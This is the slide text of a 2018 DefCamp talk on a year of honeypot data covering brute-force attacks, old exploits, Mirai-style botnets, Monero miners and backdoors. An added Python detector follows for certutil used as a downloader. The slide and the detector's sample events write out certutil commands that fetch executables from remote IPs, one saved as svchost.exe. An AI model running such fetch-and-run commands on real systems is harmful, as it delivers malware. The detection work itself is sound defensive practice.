From Mirai to Monero – One Year’s Worth of Honeypot Data

Adrian Hada and Mihai Vasilescu in Bucharest, Romania on November 8-9th 2018 at DefCamp #9.

The slides and other presentations can be found on https://def.camp/archive

  1. © 2017 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED.
     MIRAI TO MONERO – ONE YEAR’S WORTH OF HONEYPOT DATA
     Adrian Hada, Senior Security Researcher
     Mihai Vasilescu, Senior Security Researcher
  2. WHO ARE WE?
     • Senior security researchers
     • Love exploits, malware, honeypots and tinkering
     • Good guys
     • Hope for unemployment because #securityissolved
     • @ht_adrian & @me_high4eva
  3. WHO ARE WE?
  4. HONEY NETWORK – Honeypot distribution
  5. WHAT ARE ATTACKERS LIKE?
  6. ATTACKERS ARE...
     • Persistent
     • Not very fashionable
     • Resourceful
     • Opportunistic
     • All the above
     • Driven
  7. HONEY NETWORK – Distribution by targets
  8. PERSISTENT – BRUTE FORCE: Protocols
     • TELNET
     • SSH
     • SMTP
     • POP3
     • IMAP
     • VNC
     • HTTP
     • Wordpress
     • Joomla
     • PHPMyAdmin
     • And the list goes on
  9. PERSISTENT – BRUTE FORCE
     • Note: one “event” is per-hour aggregation
     Chart: Bucketed Brute Force Events (y-axis: Events, 0–250000; x-axis: January-18 to September-18)
  10. PERSISTENT – BRUTE FORCE
     Chart: Unique IP Addresses (y-axis: 0–40000; x-axis: January-18 to September-18)
  11. PERSISTENT – BRUTE FORCE: Target Prevalence (Top 10 Bruteforce Targets)
     • Telnet-Bruteforce 53%
     • SSH-Bruteforce 38%
     • MySQL/MSSQL Bruteforce 7%
     • SMTP Authentication Bruteforce 2%
     • Generic PHP Application Login Bruteforce 0%
     • RDP-Bruteforce 0%
     • POP3 Bruteforce 0%
     • VNC Bruteforce 0%
     • XMLRPC sys.multicall Bruteforce Authentication 0%
  12. PERSISTENT – BRUTE FORCE: Bruteforce Stats - October 2018
     Chart legend: Telnet-Bruteforce, SSH-Bruteforce, MySQL/MSSQL Bruteforce, VNC Bruteforce, Generic PHP Application Login Bruteforce, RDP-Bruteforce, POP3 Bruteforce, XMLRPC sys.multicall Bruteforce Authentication
  13. PERSISTENT - CSI: Cisco Smart Install
     • Not that many hits (approx. 6000)
     • VMs, not Cisco hardware
  14. NOT VERY FASHIONABLE: Dahua DVRs
     • CVE-2013-6117
  15. NOT VERY FASHIONABLE: ETERNALBLUE
     • Yes, it's the WannaCry one...
  16. NOT VERY FASHIONABLE: NTP & DNS
     • It’s all fun and games
     • Until you expose a DNS “open resolver”
  17. RESOURCEFUL: XAttacker
  18. RESOURCEFUL: XAttacker
  19. RESOURCEFUL: XAttacker
  20. RESOURCEFUL: XAttacker
     Chart: XAttacker Bucketed Hits (y-axis: 0–1200; x-axis: January-18 to September-18)
  21. OPPORTUNISTIC: Drupalgeddon[23]
  22. ALL OF THESE: DLink – multiple vulnerabilities
  23. ALL OF THESE: MySQL
  24. DRIVEN - DDOS: Mirai & Clones
     • Evolution of number of events
  25. DRIVEN - DDOS: Mirai & Clones
     • Evolution of number of events
  26. DRIVEN - DDOS: Mirai & Clones
     • Fortinet blogged: https://www.fortinet.com/blog/threat-research/ddos-for-hire-service-powered-by-bushido-botnet-.html
  27. DRIVEN - DDOS: Nitol
     • Antique bot, Windows, possibly modified
     • Seen via MySQL and ETERNALBLUE
  28. DRIVEN - DDOS: Other Bots
     • Multiple documented families
     • DDoSTF via MySQL (reported by MalwareMustDie in 2016)
     • DoFloo DDoS Trojan – validate using CC decryptor from https://github.com/felicitychou/RATConf-DecryptScript
  29. DRIVEN - COIN MINERS
     • Seen via multiple exploits
     • Monero is the go-to currency
     • Reuse open mining tools
     • Example from ETERNALBLUE
  30. DRIVEN - COIN MINERS
     • Notice something strange?
       certutil.exe -urlcache -split -f <url>
  31. DRIVEN - COIN MINERS
     • Technique described previously, not new
     • Xavier Mertens’ ISC diary: https://isc.sans.edu/diary/rss/23517
  32. DRIVEN - BACKDOORS: Zegost Trojan
     • Main source – ETERNALBLUE
     • (allegedly) Chinese backdoor - https://artemonsecurity.blogspot.com/2012/12/zegost-analysis-of-chinese-backdoor.html
     • DLL file contains download URL for executable
     • Payload conf can be decrypted via RATConf-DecryptScript
  33. DRIVEN – BACKDOORS WITH A TWIST: Zegost Trojan
     • One sample URL downloaded 8.5M of data...
     • Apparently, Themida-packed binary
     • Sandbox it!
  34. “IT’S 2019. THE INTERNET IS STILL A DANGEROUS PLACE. WHETHER WINDOWS OR LINUX. OR MAC.” – Us, 2018
  35. (no text on slide)
  36. “ATTACKERS ARE A LOT LIKE US. IF THEY CAN BREAK THINGS, WE CAN PROTECT THEM.” – Us, 2018
  37. (no text on slide)
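Slide 30 points at the certutil.exe download trick (certutil.exe -urlcache -split -f <url>) that the coin-miner droppers reused after ETERNALBLUE; slide 31 notes the technique was already documented. For a defender, the useful counterpart is a process-creation rule that spots this command line despite the variations it arrives in. The block below is an added example written for this page, not code from the talk or from Keysight: it normalises the switch prefix (hyphen, slash, or the en/em dashes that copy-paste and slide extraction produce), checks that the image is certutil and that -urlcache is paired with a URL argument, and leaves ordinary certutil uses (such as -hashfile) alone. The host names, IP addresses (documentation ranges) and command lines are constructed samples, not honeypot data.

```python
"""Flag certutil.exe-as-downloader command lines in process-creation events.

Added example for this page; not part of the DefCamp deck. Detects the
pattern from slide 30 (certutil.exe -urlcache -split -f <url>) while
tolerating the switch spellings seen in real telemetry.
"""
import re
import shlex
from typing import Dict, List, Optional, Tuple

# A download needs a remote source; certutil also accepts ftp:// URLs.
_URL_RE = re.compile(r"^(https?|ftp)://", re.IGNORECASE)

# Switch prefixes: Windows accepts '-' and '/', and text that has been through
# a word processor or slide export often carries an en dash or em dash.
_SWITCH_PREFIXES = ("-", "/", "\u2013", "\u2014")


def _basename(path: str) -> str:
    """Return the lower-cased file name from a Windows or POSIX path."""
    return re.split(r"[\\/]", path.strip('"').strip("'"))[-1].lower()


def _normalise(token: str) -> str:
    """Canonicalise switches to '-name' (lower-case); leave other tokens as-is."""
    t = token.strip('"').strip("'")
    if t[:1] in _SWITCH_PREFIXES:
        return "-" + t[1:].lower()
    return t


def detect_certutil_download(cmdline: str) -> Optional[Dict[str, object]]:
    """Return a finding dict if cmdline is certutil fetching a URL, else None."""
    try:
        # posix=False keeps backslashes and quotes intact for Windows paths.
        tokens = shlex.split(cmdline, posix=False)
    except ValueError:
        return None  # unbalanced quotes: cannot parse safely, do not guess
    if not tokens:
        return None
    image = _basename(tokens[0])
    if image not in ("certutil.exe", "certutil"):
        return None
    switches: List[str] = []
    urls: List[str] = []
    for tok in tokens[1:]:
        norm = _normalise(tok)
        if norm.startswith("-"):
            switches.append(norm)
        elif _URL_RE.match(norm):
            urls.append(norm)
    # -urlcache alone is also used to inspect or clear the cache ("*");
    # only the combination with a URL argument is a fetch.
    if "-urlcache" in switches and urls:
        return {"image": image, "url": urls[0], "switches": switches}
    return None


def scan_process_events(events: List[Tuple[str, str]]) -> List[Dict[str, object]]:
    """Run the detector over (host, command_line) pairs and collect findings."""
    hits: List[Dict[str, object]] = []
    for host, cmdline in events:
        finding = detect_certutil_download(cmdline)
        if finding is not None:
            finding["host"] = host
            hits.append(finding)
    return hits


# Constructed sample events (hypothetical hosts, documentation-range IPs).
SAMPLE_EVENTS: List[Tuple[str, str]] = [
    ("hp-win7-01", "certutil.exe -urlcache -split -f http://198.51.100.23/mine.exe "
                   "C:\\Windows\\Temp\\svchost.exe"),
    ("hp-win7-02", "CERTUTIL /urlcache /split /f https://198.51.100.23/xmr.exe"),
    ("hp-win7-02", '"C:\\Windows\\System32\\certutil.exe" \u2013urlcache \u2013split '
                   "\u2013f http://203.0.113.9/a.exe a.exe"),
    ("hp-win7-03", "certutil -hashfile C:\\Windows\\Temp\\a.exe SHA256"),  # benign
    ("hp-win7-03", "certutil -urlcache *"),  # cache listing, no URL
    ("hp-win7-04", 'powershell -c "certutil"'),  # different image
]

if __name__ == "__main__":
    for hit in scan_process_events(SAMPLE_EVENTS):
        print(f"{hit['host']}: certutil download of {hit['url']} "
              f"(switches {' '.join(hit['switches'])})")
```

The three malicious-looking samples are reported and the three benign ones are not. In practice the detector would be fed from Sysmon Event ID 1 or Windows 4688 command lines; the URL field gives the responder the payload source to block and the host field the machine to contain.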
